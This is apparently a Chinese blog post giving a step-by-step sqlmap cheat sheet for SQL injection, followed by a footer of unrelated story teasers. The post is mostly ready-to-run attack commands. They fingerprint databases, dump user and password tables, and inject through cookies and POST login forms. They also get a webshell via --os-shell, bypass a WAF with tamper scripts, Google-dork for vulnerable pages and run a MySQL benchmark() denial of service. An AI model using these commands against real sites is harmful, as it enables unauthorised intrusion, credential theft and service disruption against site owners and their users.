Sqlmap的使用

1. MySQL数据库注入

  • 检查注入点(主要看是否能返回消息):sqlmap.py -u url
  • 爆所有库:sqlmap.py -u url -dbs
  • 爆当前库:sqlmap.py -u url --current-db

2.Access数据库注入

  • 判断是否是access数据库:url and exists(select id from MSysAccessObjects)
    其他数据库判断语句:

Access: aNd aSc(cHr(97))=97
Access: and exists(select id from MSysAccessObjects)
SQL Server: and exists(select id from sysobjects)
SQL Server: and length(user)>0
MySQL: and length(user())>

  • access数据库没有库的概念,直接爆表sqlmap.py -u "url" --tables
  • 爆列,爆字段,可以在日志里找到

3. 指定数据库,操作系统

  • 检查是否是注入点
  • 爆库:sqlmap.py -u url --dbms mysql 5.0 --current-db
  • 爆表:sqlmap.py -u url --dbms mysql 5.0 -D cms --tables
  • 爆列:sqlmap.py -u url --dbms mysql 5.0 -D cms -T cms_user --columns
  • 爆字段:sqlmap.py -u url --dbms mysql 5.0 -D cms -T cms_users -C password ,username --dump

4. 请求延时注入

  • 测试注入点:sqlmap.py -u url -p id
  • sqlmap注入方式techniquesqlmap.py -u url --technique T

B: 基于Boolean的盲注(Boolean based blind)
Q: 内联查询(inlin queries)
T: 基于时间的盲注(time based blind)
U: 联合查询(union query based)
E: 错误(error based)
S: 栈查询(stack queries)

  • 猜数据库sqlmap.py -u url --technique T -time-sec 9 --current-db
  • 其他参数:--delay--safe-freq

5.常规伪静态注入

伪静态:主要是为了隐藏传递的参数名,伪静态只是一种URL重写的手段,既然能接受参数输入,所以并不能防止注入。目前来看,防止注入的最有效的方法就是使用LINQ。

  • 加星花:sqlmap.py -u "url*.html" --dbs
  • 利用sqlmap注入:sqlmap.py -u "url*.html" --current-db --hex
  • 爆表:sqlmap.py -u "url*.html" -D "cms" --tables –hex

6.cookie注入

  • burpsuite获得cookie
  • sqlmap的cookie注入攻击:sqlmap.py -u url --cookie “uname=admin" --level 2
  • 爆库,爆表,爆列,爆字段

7.POST登录框注入

  • burpsuite抓包右键保存到\Python2\sqlmap中
  • 测试能否注入sqlmap.py -r 1.txt -p user(-r:让sqlmap加载post请求,-p:指定注入用的参数)
  • 爆库 sqlmap.py -r 1.txt --current-db

  • 自动搜索表单:sqlmap.py -u url --form
  • 指定一个参数:sqlmap.py -u url --data "name=1&pass=1"

8.交互式写shell及命令执行

  • 测试注入点:sqlmap.py -u url -p id
  • 利用SQLmap写webshell:sqlmap.py -u url --os-shell 输入脚本语言,输入网站绝对路径

9.绕过WAF防火墙

  • 利用tamper脚本绕过过滤: sqlmap.py -u url --dbs --batch --flush-session --tamper=equaltolike.py,space2comment.py,randomcase.py

10.sqlmap模板使用,编写

  • 尝试注入 and 1=1被拦截
  • 利用%0a尝试绕过,发现可以
  • 编写tamper模板,利用sqlmap跑库(c:\python27\sqlmap\tamper)
  • 利用sqlmap跑库sqlmap.py -u "url" --dbs --batch --tamper=equaltolike.py, space2mssqlhash.py, randomcase.py, space2hassh.py, base64encode.py, charencode.py

11.利用sqlmap来google搜索

  • 查找页面:sqlmap.py -g inurl:php?id=

12.sqlmpa进行Mysql DOS攻击

  • 获得shell:sqlmap.py -u url --sql-shell
  • 进行攻击:select benchmark(9999999999,0*70726f63409284209)
最后编辑于
©著作权归作者所有,转载或内容合作请联系作者
  • 序言:七十年代末,一起剥皮案震惊了整个滨河市,随后出现的几起案子,更是在滨河造成了极大的恐慌,老刑警刘岩,带你破解...
    沈念sama阅读 204,053评论 6 478
  • 序言:滨河连续发生了三起死亡事件,死亡现场离奇诡异,居然都是意外死亡,警方通过查阅死者的电脑和手机,发现死者居然都...
    沈念sama阅读 85,527评论 2 381
  • 文/潘晓璐 我一进店门,熙熙楼的掌柜王于贵愁眉苦脸地迎上来,“玉大人,你说我怎么就摊上这事。” “怎么了?”我有些...
    开封第一讲书人阅读 150,779评论 0 337
  • 文/不坏的土叔 我叫张陵,是天一观的道长。 经常有香客问我,道长,这世上最难降的妖魔是什么? 我笑而不...
    开封第一讲书人阅读 54,685评论 1 276
  • 正文 为了忘掉前任,我火速办了婚礼,结果婚礼上,老公的妹妹穿的比我还像新娘。我一直安慰自己,他们只是感情好,可当我...
    茶点故事阅读 63,699评论 5 366
  • 文/花漫 我一把揭开白布。 她就那样静静地躺着,像睡着了一般。 火红的嫁衣衬着肌肤如雪。 梳的纹丝不乱的头发上,一...
    开封第一讲书人阅读 48,609评论 1 281
  • 那天,我揣着相机与录音,去河边找鬼。 笑死,一个胖子当着我的面吹牛,可吹牛的内容都是我干的。 我是一名探鬼主播,决...
    沈念sama阅读 37,989评论 3 396
  • 文/苍兰香墨 我猛地睁开眼,长吁一口气:“原来是场噩梦啊……” “哼!你这毒妇竟也来了?” 一声冷哼从身侧响起,我...
    开封第一讲书人阅读 36,654评论 0 258
  • 序言:老挝万荣一对情侣失踪,失踪者是张志新(化名)和其女友刘颖,没想到半个月后,有当地人在树林里发现了一具尸体,经...
    沈念sama阅读 40,890评论 1 298
  • 正文 独居荒郊野岭守林人离奇死亡,尸身上长有42处带血的脓包…… 初始之章·张勋 以下内容为张勋视角 年9月15日...
    茶点故事阅读 35,634评论 2 321
  • 正文 我和宋清朗相恋三年,在试婚纱的时候发现自己被绿了。 大学时的朋友给我发了我未婚夫和他白月光在一起吃饭的照片。...
    茶点故事阅读 37,716评论 1 330
  • 序言:一个原本活蹦乱跳的男人离奇死亡,死状恐怖,灵堂内的尸体忽然破棺而出,到底是诈尸还是另有隐情,我是刑警宁泽,带...
    沈念sama阅读 33,394评论 4 319
  • 正文 年R本政府宣布,位于F岛的核电站,受9级特大地震影响,放射性物质发生泄漏。R本人自食恶果不足惜,却给世界环境...
    茶点故事阅读 38,976评论 3 307
  • 文/蒙蒙 一、第九天 我趴在偏房一处隐蔽的房顶上张望。 院中可真热闹,春花似锦、人声如沸。这庄子的主人今日做“春日...
    开封第一讲书人阅读 29,950评论 0 19
  • 文/苍兰香墨 我抬头看了看天上的太阳。三九已至,却和暖如春,着一层夹袄步出监牢的瞬间,已是汗流浃背。 一阵脚步声响...
    开封第一讲书人阅读 31,191评论 1 260
  • 我被黑心中介骗来泰国打工, 没想到刚下飞机就差点儿被人妖公主榨干…… 1. 我叫王不留,地道东北人。 一个月前我还...
    沈念sama阅读 44,849评论 2 349
  • 正文 我出身青楼,却偏偏与公主长得像,于是被迫代替她去往敌国和亲。 传闻我的和亲对象是个残疾皇子,可洞房花烛夜当晚...
    茶点故事阅读 42,458评论 2 342

推荐阅读更多精彩内容